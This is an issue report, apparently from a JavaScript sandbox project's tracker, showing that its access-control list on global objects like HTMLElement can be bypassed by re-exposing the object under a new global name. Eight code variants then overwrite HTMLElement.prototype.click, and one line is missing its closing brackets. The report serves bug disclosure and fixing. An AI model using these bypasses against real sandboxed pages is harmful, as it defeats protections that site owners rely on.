[demo][acl] ACL can be skipped by cloning global objects

[t2ym]

[demo][acl] ACL can be skipped by cloning global objects

Root Cause

Assignment of a new global object cancels the ACL for the same object.

Example Reproducible Code

  window.HTMLElement2 = HTMLElement;
  HTMLElement2.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperty(window, 'HTMLElement3', { value: HTMLElement });
  HTMLElement3.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperty(window, 'HTMLElement4', { get: function () { return HTMLElement; } });
  HTMLElement4.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  window.__defineGetter__('HTMLElement5', function () { return HTMLElement; });
  HTMLElement5.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.assign(window, { 'HTMLElement6': HTMLElement });
  HTMLElement6.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperties(window, { 'HTMLElement7': { get: function () { return HTMLElement; } }       
  HTMLElement7.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperties(window, { 'HTMLElement8': { value: HTMLElement } });
  HTMLElement8.prototype.click = null; // ACL for HTMLElement.prototype is bypassed

Possible Quick Fix

Add ACL to avoid cloning global objects with their own ACLs

Note:

ACL can be hardened to avoid such situations by applying multiple ACLs for the same object. More research required.